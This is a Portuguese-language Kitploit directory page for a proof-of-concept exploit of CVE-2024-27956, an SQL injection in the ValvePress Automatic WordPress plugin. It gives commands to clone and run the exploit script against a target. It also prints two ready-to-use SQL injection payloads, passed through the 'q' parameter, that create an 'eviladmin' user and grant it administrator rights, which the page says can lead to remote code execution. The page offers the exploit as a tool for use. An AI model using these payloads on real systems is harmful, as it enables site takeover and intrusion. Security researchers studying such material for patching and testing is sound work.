Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-27956-RCE — Prova de conceito de exploit para CVE-2024-27956, uma injeção de SQL no plugin ValvePress Automatic para WordPress. Cria um usuário administrador e permite execução remota de código por meio de entrada não sanitizada. | Kitploit
Ferramentas/GitHubGitHub/cve-2024/cve-2024-27956-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubcve-2024/cve-2024-27956-rce

CVE-2024-27956-RCE

Prova de conceito de exploit para CVE-2024-27956, uma injeção de SQL no plugin ValvePress Automatic para WordPress. Cria um usuário administrador e permite execução remota de código por meio de entrada não sanitizada.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-27956-RCE

Um PoC para CVE-2024-27956, uma Injeção de SQL no plugin ValvePress Automatic. Este PoC explora a vulnerabilidade criando um usuário no alvo e concedendo direitos de Administrador. Ser administrador no WordPress pode levar à Execução Remota de Código.

Uso

root@kitploit:~
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com

Payloads

Payload de Injeção de SQL para criar um usuário:
root@kitploit:~
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')

Concedendo direitos de administrador:

root@kitploit:~
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

No parâmetro q, podemos passar nossa consulta inteira e então ela será executada.

image A entrada do usuário é executada diretamente sem qualquer tipo de restrição ou sanitização.

PoC

Baixar ferramenta